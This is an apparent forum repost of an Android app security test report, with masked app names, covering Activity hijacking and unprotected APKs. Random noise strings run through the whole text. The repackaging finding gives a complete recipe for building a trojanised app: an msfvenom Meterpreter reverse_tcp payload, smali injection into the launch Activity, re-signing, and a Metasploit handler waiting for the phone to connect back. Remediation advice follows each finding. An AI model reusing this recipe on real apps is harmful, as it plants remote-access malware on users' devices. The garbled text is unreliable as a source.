& u( z8 r3 P/ c3 w1 t7 @ , V: V0 p, b( }; Q8 s+ i9 ]4 `1 v
: y0 [8 m d& X/ P9 e0 ]
% d1 I v- Y( N$ P7 j. e$ p1 l% y0 D2 c5 w
3 Y2 G$ J3 |- Z! I
+ T, o/ l" I+ v% a
表1-2 测试结果
' A4 @' l9 `2 ~, ^ Y7 j
7 M8 I0 n0 w+ F+ U; P- O& u
& U: N6 G* Q4 m9 f# _: J+ y
& D$ o2 Z( R: N& p 0 v! Z4 R! t: z% z m- Q- Y* K, q
9 |* R+ O- U0 p) ?2 N7 b
2 [) N$ M; S S7 v8 |: i( a: j: w- C3 B# ]/ l# D
# W0 J. g% F1 y, e" s, W! ^! ?) G
% K, r, L2 I% {* Q4 a 2 ~! l1 X9 W+ p
) s4 E' u. R% [5 Q% E4 x 2 检测结果 4 I6 f \- q, v! q
, @! K* C, R6 {& \- B0 A
7 V" B3 O$ u7 c7 }: U9 T
) v& ?9 b0 z; Q) _
1 J8 x `6 j& b- |
4 z2 C: |( {% M9 V6 Q
2.1 某某某
1 a2 R* h% B* w4 d3 U3 K/ F; j7 z" B( k& k
$ `7 ^3 N w% L9 Q1 Z) k; v" w/ D1 {- e2 {/ }8 E
9 E# B# x' }9 a5 h* } {# }
; @9 j7 H" x$ a0 N3 } 2.1.1检测目标 & y0 x: P/ p8 L
4 D& e% m) |! q
; S) x, [4 a# b3 F3 k3 A l" Y
5 F1 P9 Q0 n# X3 R
& h( q6 s8 ]1 o- s" s! y+ t
% l$ Y8 u9 R) r5 w; ?7 X, a, H4 `: I
目标地址: 某某某某某某APP 6 @9 ?* s! t$ x8 c
- a; i0 S9 q* d
! \4 A+ R7 Z% P) e! [6 A0 b2 r% U% C7 [' S& n" X! t" C6 o6 t
: e$ {$ s5 e4 W3 ~5 V) S5 J$ r
7 ^* m8 M& S9 B 2.1.2检测结果 5 P; m: W/ {$ ]" W9 y
# a4 I' R0 j0 Z% R: s
+ m" O. [9 \4 t6 L/ D
0 b+ `4 G$ t' y* W
2 C V: |4 Y7 Z' p( J& C8 g3 `8 d7 Y$ Z% s" t1 T1 f# ]
2.1.2.1
* c3 ]: ~. ^6 a
8 l* _4 x. \' S7 S! L a. P
! l9 n& ]) Z' Y8 _
C+ k" f* r. c& i. |- k% ` t ' |, t3 o3 o% O
7 X/ r! q6 v# S+ K
漏洞链接地址:某某某某某某APP 9 R3 ^0 y2 d& K
7 \5 ]2 g# L- d+ q7 D
# U1 O. d4 o& A- [2 w- A" ~8 M b3 R r3 s" o: A7 C# e U
2 f9 `9 n% F0 W% Q8 H( B
& [% T: m! s$ {
( p; r! g5 E: w7 N& p; }
" H0 z4 s5 r" @! @5 T4 p/ w; C, h7 c
% `! z. f/ d& x) q$ \$ |( D g/ t/ R8 l. Y" \8 s/ f6 N& N5 B
) }$ e [3 s) F
% C/ C9 p4 z$ b! P
漏洞分析及取证:
' U! s& Q5 C O' i! k# K1 D. }
R z1 z$ O! L r9 g
( P3 J" T( ^& f- [1 [* I2 Y9 j9 T2 i
3 t2 v+ S0 Y7 h. K
- S4 L7 j. _: s% o, c
; `7 O& h/ j2 d/ e' W9 ? 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: , Z& {0 B5 Y; y- f) i' |5 q
1 b. T, x( _& V9 m& c; l
( F. B( }7 w. N
4 M8 h; S) j, `1 B9 a' j
% z, X7 J' N6 r. @$ w% v2 N! j( y# Y f, l; P/ s& ^
3 W6 g; t5 O2 d7 f
: P* k5 C) `1 V* A
0 s& M2 _5 i/ U: W* |6 ^! I
7 S. c0 f8 F& l7 m2 N
+ z; z6 W d) r8 B5 g2 Q4 V7 d; F& V% @( q+ G0 h1 m# U1 K* K4 w1 J- h
N/ m; ~: \+ I- z3 W
; Y) {9 Z2 ]$ e2 k, p/ M
* {" `2 h. j) d- v/ G( C
# {2 y% Z. m! ] # M+ h3 P; u8 _! U0 _' Z. q
( _- U7 Z7 k- x$ C# P3 H 
( p5 \) n% o9 m; S* b6 {/ L! \' Q& h! d) l3 I& }5 u+ Q
1 ?) e9 w" h5 B- y4 C. l# e) f
+ l% l% A, I7 `( _2 L
6 Y8 `0 Y! ^9 o5 i' G) ?% x G/ p, b& `% F$ s7 x5 j% U3 _4 \' l% w
7 }0 t; e$ P) d$ i" I% c R; C, D8 H n
1 b8 ^" \, I+ q8 l3 O8 [, v( I! F: L. |
4 c* X& h- Y8 O, F& Z e
4 D6 z/ W$ N) D5 D7 j2 S5 f/ c 
% {3 ?! O6 k- ?! n/ G) U- k) j7 f, e; @" [
0 H, c$ F/ W/ D; [3 E' i
9 O9 K6 h: w5 ^+ q1 O. v2 ?1 F
1 P+ B! o% E! S. k
" d8 j% U; ^! u9 J% i" \7 C2 n 漏洞危害:高
; a- \0 z1 O1 ] H3 O( c
( }& r0 P+ N2 b6 E( n/ u9 }8 G7 k
# M+ Z8 ~8 c& I& f
! F' L0 i9 W( O+ B1 m5 w" T1 P% U + S1 }$ B4 W9 Z2 |2 x; c
8 M; o% H0 t- n* r2 O ! T9 P8 B" P; `- V
) Z0 P- D; \! U4 P/ C4 d; X
& n3 o7 x9 k& |) Q! u
1 Y7 c0 ^& G/ p' ?& H+ E
3 K4 B! S# @5 ?# k: W
. W2 o$ P( ?/ A; d! x" r& A |
9 P; Q$ b6 h5 x6 `. s+ N, L+ {5 E- E
2 k+ }. |$ B, b: @( s* G% {
8 }/ v; G) n8 Y" W- n+ } 严重程度 0 | L' T. N j
& q( u( Q0 f. E* H6 q
4 m2 X. L( P7 a+ P
# T/ l, g' L5 h4 i& w3 g | ; M8 G2 m0 b: ~, L* v& u) S1 T# h. Q
3 `* Z0 X( Q4 d1 b) H U, j+ A
: {) A+ J$ T- \6 Q0 U0 c
" k# `0 R6 X0 D9 U 7 |0 s9 K* O! V. [
! i$ ~4 `* @& a2 |
高
1 d& Y" f+ t( s1 ~1 P6 ~$ f1 H* K5 d }
) W5 f m* q' X2 H) J
1 J" i4 t* s) |( U; @
|
% m. h" u; N9 s$ k( C+ Q, Q
1 g) X) u8 d9 v/ q( N, P. ~' { - S1 H' }3 e5 y: s+ D3 X9 V
3 ^" x( d O- J) X7 T4 s # c# O: T( S8 b% x) K, a
1 d6 d, t6 d2 O, N. B4 \
■ 2 J- J4 i0 G' @4 @$ u, C5 G
& Y( z1 N/ [ y& V
+ |* V2 T1 M* Q( `$ A
* I. K8 D; Y3 E8 Z | - T2 T6 {' E2 h
$ P# L) X* @- S
+ }5 u7 a- k2 p( M0 k9 u. c; w3 c* D# L; a
- T ^; a$ }0 {) u+ V3 U) [5 J) T- R1 ]4 g; s4 q# i
中
2 O0 n I5 ~3 x
! g w4 |4 C: f1 m+ v 6 Q, z/ K$ K. o4 {
5 M, B8 c) w3 N |
* j- L' [6 Q5 U8 o3 i: Z$ Q0 @5 Y& k; j! G! `
# c9 [8 T+ \$ i) H, S5 g& ]7 R) i' p6 K9 g7 F! Q( I; S/ K9 S3 W
! l9 s z' S! m, _* q
8 z, z! v0 b3 ]$ m) X) z
7 q1 t' [( L9 M6 P7 Q+ k
/ N: t. Y) H- K9 r6 o5 P4 t
4 M) \' c$ H! [, U& z! N) [
Y8 j% m" F. H7 Y | 0 ]- K. c0 {0 N6 r' p9 e
& C# H$ @* W6 C. R 7 X# q1 `' }% x1 f) b
' k6 {; l1 V- U5 T4 Q, C
% ?% y; N, ~3 O0 e2 M% ^# e. g# G% i. ]6 B( p$ ~% T
低 . T6 ?& G' r: s; n7 q1 i
6 |. r! ?2 y" {
- ?" U& l! p& A' ~6 P4 V) f/ @% m
1 ~" G L4 b& `; w, _6 x | 2 E; K: B: z5 }7 t$ ^
& I9 C( T* p% c7 Z7 n
8 x6 m* d% H, s" V3 f: V$ Y- D
1 n" e2 O! ~! @ e* b5 q, S
f$ {* G0 C( c1 Y) M( J- ~* K- [& m% a
" ^, l8 D9 j4 {
2 x, P5 E# ]4 C; G4 n" R% _* K
3 n( v1 l5 [/ }" U* ~% h. _; q+ @* ~* m) M6 {* R) L5 O
|
8 }* W! B( O, J7 @4 T; U
8 D- b3 C: K1 V" ~( X
5 k$ G1 P4 o7 f7 F3 B( V1 r: r
4 f$ W2 n) R& I- d7 }2 g5 D
2 J* S! W5 d7 p8 }3 z r
* C" a/ Z; H+ T. n3 B
; x7 W' U! r- N# L' o
8 A0 I; O5 T: E8 }9 J: w1 f 3 v" L4 G; T" P- d7 H/ M* O/ Z W
; J E+ f! j/ k8 c% w. r# i
; a7 o7 Q; O" i! N u2 W3 w! [1 Y6 T! ?
: C7 T( X/ x, d' A: e
, m5 p8 _+ `/ U( n8 t6 U9 G9 {$ r
: @' j5 c& y. O4 t4 B$ D. ~( J; \
- I0 m6 ]9 `) T( k, [! }
6 R- N# u" [1 {( ~; ~
2 z% h/ K* Q% q+ b% i 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 1 q/ S1 j9 [1 g* {: D& J% R
+ g, P0 `$ T' ]
. l2 ~ y2 z7 N- s. o
$ q8 l- t% Q' R/ ~, z/ n
; U, Y9 l, D1 V! s% h1 l3 H* c! @! v) @8 U8 [0 g- t
8 H! V+ `( V: q1 d" {
3 p9 i/ s' O8 c' B
0 Z# l& h3 ~! v8 P1 E3 I6 W4 E
* w9 `9 q' a1 x5 P* K7 B & g! ^# t7 ^6 J$ p0 C
& e/ M( l$ t, f9 Z' G, u9 m, _
! f& k" l. O' z( Z; ^* v
1 o+ |' f5 s6 j5 U, X% o
, \3 r/ \5 K! n: Q8 f0 d; A( t0 U: \6 _. r+ p
! D' l# R7 o- b, P
( Y/ V, h6 j4 X2 h, ~" e7 O
2.1.2.2
' T8 D0 S" @1 b! U* P; q
4 }3 b. j% e% b9 c( f' t: G- R' c- M
( R- f, q& U: L% c$ X
& ]. B( n) p: C6 r7 {) l1 {% M
- [5 x! T* I+ D3 n9 B* ?9 R! f" T$ ~8 k" q/ E& _
漏洞链接地址:某某某某某某APP
% H6 e8 e- {9 G% t8 V, `, d* h0 w+ F) ^2 M; z7 O
_7 g' m/ p* o$ q- \. g
, Q. ~; y, T7 f3 W
' K4 z! }2 C" Z. T* E% U2 H, @6 i* _" r' I3 B) Q+ y
漏洞分析及取证: 0 j+ P, z' N7 H( P) ?
: `! J6 p7 U! L2 X5 [* Q
# a$ u9 d, d- g' |8 G' i- J1 k5 |6 h( w/ Q/ Q
+ E" O$ c( H' b. `2 D0 e2 r5 W& o" V( @
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
) V6 n/ |$ i& F1 |9 e. E' J$ U% X/ h& l$ H0 a) K
8 S+ _7 M, v! y" ]/ ~
3 a& n: J( @7 f1 ^3 ?6 U% S : P, l' h( |7 k
+ I# f% p! k$ ~6 n# g
用Metasploit 生成木马 apk
9 k0 s6 y0 w0 U b* g! d( f0 B
0 E3 C7 {# Q2 {! F
7 h; L$ r" C1 [
1 L1 h8 {1 r" f% a2 r5 s
% [% u1 R8 Z2 m( h/ ~- h
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk # w( b9 {& |4 S
1 H7 Z1 d* F1 z* Q( }; x
c$ C' H, u' F2 i
6 h- }& H/ j3 m. J, J3 V
4 g, v9 J4 v3 U) W9 G9 ?$ l) v* @6 l
反编译目标apk和木马apk
3 A% H! d- f1 D& s
2 @5 ~) s1 w7 d0 V7 P& U e2 U
# T3 |6 R8 P, N2 H7 b
5 P" `( ~, X2 d; P
9 v- }( G4 f0 o( H
# l0 C, _8 N! F3 f' k4 ?+ n, w# ~; A apktool d target.apk
5 n1 b B) \( U7 k# t5 p1 ?& l* l. ~) E; @" V
apktool d cockhorse.apk 5 o/ `9 o* T; v* ]
# x4 U2 G6 [! c7 d
% q) M# [* [/ D
. V7 }. J) t# M$ N8 g9 v
- w2 K5 v* H& t7 F# z) f- ?% z1 J% N/ ]4 y8 M0 M
木马 apk 注入目标 apk
! A! @, w1 s. S$ p
" ]2 j; f4 D# Z, ?
4 u' N, u7 N+ g, W
, T6 ^+ I x8 F3 B. T1 ^7 t; F$ A
: [- n; |4 R% O$ I+ {' o
& N! H) H. l* S" D1 v 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
, N |) w5 O4 N0 |2 A
: E$ E6 l; W. _$ ~: P' y invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
- V# S, Y3 b. j; g% r. ~* r
! {: ^/ u9 d3 T2 a3 o4 [
( Y( k2 x3 E: O' f1 ?8 [+ c; G# X0 { ?4 M& r9 D: Q* r
( p, e8 w! A: e; N8 X# y+ j5 U! e$ @! D/ F& `8 q
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 9 W! V* t! ]* M
9 ]; N) h5 ]/ M
+ a [- Q9 `1 {- }5 T
4 w \2 X: M' Y) _0 p' U- p, \
! |2 k% a1 p7 a7 I; {! [) I( K4 C2 N3 ]1 R/ O8 e
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
9 r$ k$ T: t$ F- W+ _1 g
: w1 a8 Z4 I1 t+ J+ r
) d6 ^2 C) o4 s! x( `8 Y' Y, B I/ N
5 n8 T/ m8 \# o, D* `& h) l8 F4 h x/ R$ X- m8 N! @
回编译生成最终 apk
0 Q; p0 `, Y: a U/ v6 y$ i8 v2 k; j: _
) g4 R* i6 J/ P' K
; `! V; w" V2 t( [) z [4 q: V5 s 0 {' g4 p/ F0 R7 d
0 o& k! z: u* P4 Q/ t& a
重新打包
9 ^7 ?2 ]; w9 C8 F6 F# ?6 m/ @5 v; ~7 N. p7 F9 S2 r
- o' L+ K' r/ B- e$ f- |. l2 |/ F$ ]4 A0 D: s4 g; N1 m
/ x) t" i& R& O! U9 z$ @' J9 l2 X& @7 y
apktool b -o repackage.apk target_app_floder ! J. _+ u! |! X/ \
# s* m! E3 _% c4 J8 g
5 G3 @" U8 n6 y* l' d y4 k3 f( J4 \5 H' \( N
0 v; ]. ?# ~2 u; x2 [$ @, l7 A0 U4 Q3 L" I5 J M# n
创建签名文件,有的话可忽略此步骤
1 ]2 y# Y8 o7 g/ Q$ y4 }7 k l. \' U7 ]3 e
3 T6 \% C6 ~# R" |4 U! Y6 k# n9 C
% p1 S& U) e6 \2 F: l " Y, V% S% X) [
: Y ~5 X: T% {3 F, V keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
4 G9 l# e$ |: l- w5 x8 S# T0 f( D
& p4 q7 x( ] I# d9 R( t* |
" F& ?7 \. z6 |
! K+ { ]1 k* ?- i1 s0 L. z
' [$ d& J X, A' i* n3 P
' [) g" j" R+ B$ c6 j6 x$ ?5 f5 F
签名,以下任选其一 2 P" m. V% ]- t( I/ d
0 B6 f+ S5 b7 P+ \0 F _
2 R' m p, @. T! y- \8 s9 k
8 `- @6 G6 P- E$ @ # B$ C( p, r4 }7 L
) R1 A% s s- j, b
jarsigner 方式
. Z2 R" _ m& v$ F2 g; o, L7 h4 G
7 ]7 t9 r2 g* i) v+ f: M; B
' y$ q' n+ J- j( [$ g+ F8 ]8 k% n( a" S
0 |' V. ?) M# N, |& I4 N! ] _
& c x0 a; i8 ]: m jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname $ J8 R' |! p2 v p, V
b2 m# h% z3 O; @6 F2 m& k8 Q
8 u# H1 [1 v5 a; M" P8 Y& z. h& u* Z, C: Q$ o' [* O
, |, m/ A6 s% ?, P1 \5 f" s- c1 Y+ b1 r
apksigner 方式
7 P8 r2 w6 y4 c2 f$ T" S, _2 y, X, C1 P; k) T& |
4 N1 ~. W2 v3 D/ f' o$ W! q
, t: q2 M4 F9 N) O( V. i
' M! Z: Z; h% h- C* |' S. T* r. e
- s% z1 L R7 a3 G! ^ apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk - s/ K1 B& R) c2 D' u- E% s
9 n, u1 e1 k" B2 x0 ?8 d
2 C; d( ]; P+ M- Q, }9 z, s% Q; ]! }4 f8 b$ }$ a
3 ^0 Y; a5 L) |/ V
' {9 b( x! w- b 如需要禁用 v2签名 添加选项--v2-signing-enabled false $ y# }8 P8 J4 o, A2 A0 i1 Q& n
8 E1 X8 }" j# w% N5 j$ s. X
9 S7 A/ j7 P8 h# J
9 w5 e8 A* ?& C( Y# Z! B5 r ! n7 d' P+ G6 D( c
& s5 ~; J# X& ]+ Q 验证,以下任选其一 * }$ ^0 L/ t/ G6 \% Y
8 x: Q/ ? e `# n' `
4 n' ^, o5 x2 Z+ Q& n4 C& y+ X" F0 {" W+ d* u% F. l+ G
# g5 _7 ?# {( J$ Z9 ^1 k' F% Q: ~* m# k+ _ O% b: x; |
jarsigner方式 : } S& T; y7 [, J( p
7 m/ C* a; }7 V$ y' s
' v0 n N# `* K3 E" P
; F. ~, v+ r8 [
9 c. F3 g |" o/ e3 A) ]! D1 }! q7 Z8 S, I2 r1 Y) c
jarsigner -verify repackaged.apk ( c$ y$ X; M T# f. u
4 o; o8 r, a2 T# H( ^
+ |$ g) {+ S# E
" t1 V) a& E% f O2 x' T
% J( f6 j5 m0 n
c! U- J k, ]5 E8 ~/ [; ^ apksigner 方式 / I' N: e& T) w% T) z: Q$ H8 w: B
9 {8 a u+ J: T% x
. j% X/ Z8 t8 s* [5 ^4 j& A7 |& G5 b+ f& W* p
" X! G# |( d) Z [- k& s2 s I
4 a: G) x! Q; M5 i; k apksigner verify -v --print-certs repackaged.apk - f! E9 ^+ s" E6 `" ]5 E" Q& ]4 S" e
) Y) }7 ` c6 q4 a4 c. a3 B$ G
+ S2 h2 k/ W% f0 S- q; u+ n3 F5 y$ H# f" `, n$ Q
6 g1 T5 o' R, ]/ y4 `9 R
& u0 R" b3 [! R' j, f6 W/ o keytool方式 6 V4 |+ f. x5 \/ w2 O2 N; ]
7 V) i# B* B8 R
- t+ \# `4 V# o6 o1 l9 }1 r
' g+ e& e2 d( j0 S% @6 @
C/ t: E+ Q3 j: \, `' `, u
8 x. q3 a7 v9 O/ L
keytool -printcert -jarfile repackaged.apk P4 P$ k; G% s) U
: V" \) i5 o( j
1 C0 `6 l' ]2 m
6 |( |8 {1 {& k9 s
( t: J9 C+ V8 y8 A7 I: n
" O) q5 `1 ~" M T. }
对齐
0 N5 r; M% |8 E; `2 `0 j5 o, [& @- G
7 U+ W) M# ]- r1 n4 [
" b% s* M1 O; S; `4 r5 l3 Z
- v! y7 Y" F' y' G3 c
: F( K5 L6 n5 @; w) R8 [6 G9 P
& a- p8 h! V$ T9 m3 N7 P% W 字节对齐优化
% S# |, O; }! z* T5 C
/ ]5 W6 V: P) y* @* f. w, _, c4 c4 B
+ a4 U: ^2 X2 a5 O5 |
4 i2 a3 D* c1 Y0 i0 m
; Y6 C* d: s9 [. m q& ^* [9 n
8 w) S' o2 J4 l4 A
zipalign -v 4 repackaged.apk final.apk
* |, h; s& g& ~$ l# A8 y K1 i0 P2 P# l0 ^' i
- W- g2 r5 ~+ j6 a- L
' R2 J% d$ f. F6 U& P
/ _" D# A' f/ t$ N
% Z5 \/ o# o, E 检查是否对齐 % m7 ^+ O) X$ o. Q% {
% p0 s9 b1 Y" n! P6 s
. i9 V$ Q& ~8 L3 Y: ^3 V; c
F9 J0 f( g* p1 t
$ w( u$ @9 G) v) H
N+ F, K6 R8 R H/ t: @ zipalign -c -v 4 final.apk 2 m: R+ i' M7 ^! B' n$ S$ f
V2 J: {; X7 a
4 u% c; t/ z# ^: `
6 |( w4 Z+ w$ j. S0 d/ E1 l5 b , ^* v1 k% u; x
6 E& G9 V5 g; J0 E
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
4 }) S3 t5 H% k/ D3 u) Z6 r3 y, R- |- z; K) g* o4 T' [
8 R! \- l1 d/ `9 h1 ~- ^5 |" D0 c, U/ y' x! U
+ `- Z) u1 ?+ Z* ?# ~
/ A& ^. f/ g" ^5 q6 v4 J 启动Metasploit控制台,配置参数等待上线 & `! u/ u" o2 K& t) o# x. Q& f
1 n, _4 A' q3 \. _1 D1 d* x& Z7 y
' ]' D" P, e: b' L E7 {
+ f2 d# ?2 t7 {! v) R6 U6 ~5 f
/ }* a8 f; f0 [) U8 w1 K0 c# j# m( j& l$ O
在终端依次输入如下命令
% ^, f+ f% q* Z8 E8 I1 a' M1 n
% z6 p) E% Z: Z- b* k6 v) W
c+ w2 f6 A8 Q3 q
. a. s7 o$ O* `- Y& a ( }8 o+ o- i% n0 S" Z
$ H! d0 ~' m; e. S" l3 ~$ p
msfconsole
) Z8 b0 _0 b1 g3 W6 Z& U% K
2 y( g- n/ J1 g% L" }
4 s( S8 c6 x# t6 r$ w6 y* U
0 b$ ~1 {4 o& A# Y$ S( ~* T
' J3 I0 {; h' {3 y) \5 m( R c9 ~) l* a. y
use exploit/multi/handler 6 M/ O& c$ Q- t# `1 F
3 v3 G/ v' @2 Z) l
0 b+ k) o. v2 N+ K
. d* K9 _) ?$ D' i5 {% e2 M: q# A; ] 6 b! X; V# }* Z: n# C f2 ]
% G4 X$ V; F3 f+ }8 @( I) S set PAYLOAD android/meterpreter/reverse_tcp
: @8 J' `8 p5 Q- |* h# {! L0 Y' H( M5 q u9 i/ f* z" e
* g+ f/ E, M0 y B- m H2 i" U" C
6 {3 R, P* Q3 _+ h. d6 \* H. }4 q s2 r6 D6 i8 e% t3 e9 l
3 H0 ?# x, I) {, |" E9 P9 I set LHOST 192.xxx.xx.xx " P4 g, D* Y a7 D
; `% _. ]" z; {0 B5 Q
0 t3 ~; L+ X( E G' b4 J
+ p" f) ?! a& O8 A, F& z9 M
/ w. ?% m3 ^3 s H
) J/ s6 Q6 q2 |0 a- G. G
set LPORT 4444
8 C: t3 i* ?& P, |: F, ~6 w W9 Z2 B8 E2 L+ A
d/ G3 V9 L+ }8 C* Q7 G; Y% w) U
- z9 a9 ^% h; c# x! j ( T9 k0 L2 I& C8 R) C# Z E% D2 a
3 D1 ~1 z7 S6 G# G9 d ^) ]+ z
exploit " ^" f+ [/ v) w# C6 B; v9 O
4 b/ r! p; A+ E8 [
, [& Q9 F. y0 r4 W
: X5 X0 X7 B$ w9 m
8 K, t3 {: ] R$ w/ b7 N
$ K+ ?$ t' X" r+ N( J* I 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 
7 G3 u# ^( w. F1 e
4 j$ `' c7 h3 |) M1 {3 l
8 w y! U, T1 i. E; \* U
+ s P3 j0 C; f) ~0 ?1 g3 q & S) c/ U B/ c2 l- j! j. H2 I
8 P7 X; D* T! ~4 S 漏洞危害:中 & }7 P M% J t+ o3 f; f# G
1 g6 |- I+ ]. y7 f% I$ M. I* X6 K
1 {; N% |, a7 B2 z( j
2 X$ N( z1 t- |0 x G
! B) `: t6 F# g% I: k6 X( V* C
! X. v y! a4 U: r# G % p1 {2 Z6 o+ j1 h! h7 `
+ r$ |& n4 X5 S2 _& R- P
}( e- g) I. g- V1 p) X
0 |2 ?8 h6 ~+ L- ~) \+ }, [2 Z
+ u- F; }8 B5 A
- @1 @9 Y- m, p. E/ ]6 I2 h1 _# X * w1 e i4 U. f+ _
+ g3 C6 m2 v% P" G |
) Z: L8 O# U9 D6 B Z+ K7 P/ Q4 s; X- Y6 c
" \3 t+ z% j$ S
% l$ U, s5 s# S0 M& ~/ \8 y3 ^$ T 严重程度 # K% M4 |! t* z9 ?
) _2 G# a; L6 S) f8 ] i) A
( g ]+ \# H- n a) p5 ]/ `& }/ w; Y- j( w
| * g2 N/ U) U. k) g3 S
6 U2 K0 j' Y. N" |
* k' C0 D9 v% |8 d4 w }
& C0 i0 y0 b2 g6 z0 N
^. y6 T0 D7 I0 V8 B) ?- c8 `6 r$ O4 `' t. Y
高
; }, ?! y3 r$ k) L- u1 O. n- {# m- X0 |/ M. r/ P
: i1 `2 [6 I8 x: E8 k3 O# W
4 ^6 H: Z! D5 V* U
| , K1 A9 S) m. Y4 R
; u2 \+ ^, m. p% E6 A/ j : d; T# ?# p3 m6 W2 D5 ~' e; s
9 L2 a. h) X9 Z: x% I1 [: Q
1 v/ s1 k9 n9 U$ |( t$ l
/ ^# L$ `: G) Q# c3 ^" w" w ■
; o; K# q6 q6 l
! z& D9 A1 i0 J! v- l/ U 9 l4 b" T" Q5 z/ [
% X9 c9 n0 r2 R
| . y( F) G/ L( j n
% J P& T5 \ ?) n1 ^7 h+ W
) k- f4 r! L2 K1 ]' i) E
% { H. R5 n4 |# D# h; f
z" M) W, h) p2 ^* S! @. |, E4 H. @" E8 Z- |; i3 E' o
中
0 H/ i! l" t6 V. ^, ^8 v/ ?' b
. M" N; [; i3 |5 [# t
$ X5 k' l$ j' C6 R2 F9 @( [( ~% t2 O: Z9 Z! U& z
|
8 b Q" ~! v d4 U7 A
: T& Q1 r" [: `! w% l
8 `( n) R3 @8 U( e! L$ |" b( A
8 h! U" O( p$ ?0 _# t9 b2 X# [0 [ : L$ o, T/ m; C2 d/ z% S7 Q+ ?
0 @% G# h% i5 b% E( J0 A, A
) [ d5 ]3 k: s* [$ z z5 v$ Y1 [. k# Y+ h: E' q$ i4 [/ B c$ L
. G6 x4 \, C# v) D1 I) _4 @# H/ K, \4 s0 I8 T( s
; X4 U- V7 l9 d$ c+ q1 _! {* ] i
7 R4 Y- j" G4 e. i: S$ P0 N, T$ t |
5 ^1 e& H, x5 D' J
! R1 f' l7 l) Y$ P5 G' W0 X1 }2 G
1 n( G! `8 k+ s8 O. ^+ \ M! R) c5 p2 Q+ y: o
- a8 }# U5 m; E; M+ [0 @! d* W
j/ M# \' o' T% v- `( s: ?9 F 低
; i# Z1 a) Y! H4 D, z+ Y1 I& O5 J# n+ a8 z
3 i* ^6 I0 ^2 N' a2 {
9 N5 Q8 C1 Y* {1 E6 ^
| # N; r% W. Y* |9 O. w3 A* |1 t
: K+ w. T. [$ w2 H! M
- k" u' ]* o( ]- }2 p) w. }
6 r/ ~% O# `8 Z0 r' i* Q; ?/ F2 X 6 J# p& C) _: ]* k* ]. Y' g$ Y$ l
; y0 I- z x a/ p/ R1 u
$ r9 J( c% ]3 p% i: m8 I+ _
0 t% v9 f1 e- ^7 g* f3 I * x- f3 m4 S4 S+ ]4 ~( Z% E
' e! r! h/ o' f) b, u4 H
) R' _; w- [8 y5 Q) t: r7 i% i1 a
: Z3 A! s( X. i; b j. j8 c1 X |
$ o- g! p% }- g2 d a4 ^. k9 C) D/ Z. ?8 W2 g% v# S
4 T. g* j8 {% j* k* Q8 k
& d: ~$ R- s2 D# \8 I0 z% O $ @: j0 c, {- x+ H) y4 _% _
* d- Z, Q/ d0 T! E6 @
3 u1 l! _5 P. e' J
# q) U: p. V2 ~, N* Y 5 P5 H0 O1 l5 q3 H% h5 ]0 r
: L! S0 i' \& u
2 p% T: W! _ e7 O
# F9 U) U! r' ~; _/ y" u$ {
$ ]$ d: d* u7 E- J9 N6 O
1 ^5 z2 V7 R8 E* d" h$ }
5 ^: b% {, X" m# D
9 A$ Z% z, \/ h/ G( F
( _& l0 C5 I( q5 B& F" X3 c
! x( j: ^4 S4 Q1 [0 y5 J' O+ B 修复方法: , M7 p' P7 f( m$ {- d
# X/ S8 Y2 L& |# [' L
6 U2 A' t' a; M6 p1 J9 M
|/ }& ?" p# o2 [9 ^2 D2 g
' n1 n' Z& ]- }" L- r
6 ]; O, D3 }1 [) d" D 1.在 APP 启动时应做签名校验防止二次打包。
8 X) g! T# @6 u4 n! n
" J+ W- X5 m- B3 Z 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
$ }3 T0 i8 w! N7 \% K1 T
) ?. `+ c+ Y6 u- O! b: [2 ?7 S
2 d( D( W0 |/ L- @" u J
* f& |+ J' H, b8 e
! D2 N# l% g6 e" q6 W5 R; e. M7 E/ [# ]- P
8 ^+ Q8 ` ~! D( W
) x. `4 Q& m$ c( p
8 E$ m5 ?, H! @) p3 Y% d) l s0 L3 C0 K5 L3 j
4 G. E4 D7 f1 p, v9 `" ?* J3 H* e6 h2 S! w: k
' u; P1 a9 _- N7 u& C# q/ c$ w( O& L; ^1 L$ n1 y
+ p* e3 j; Y; n* L
0 {- Y4 }" o1 G4 H' z
0 K+ S) r. m+ c5 o' v2 F+ N
# C0 x% `3 q7 T9 W+ C t
: f& v0 r- a# n; Q2 B
9 b( |) L* F; F! Q' j 
发表于 2022-6-8 20:32:44
收藏
支持
反对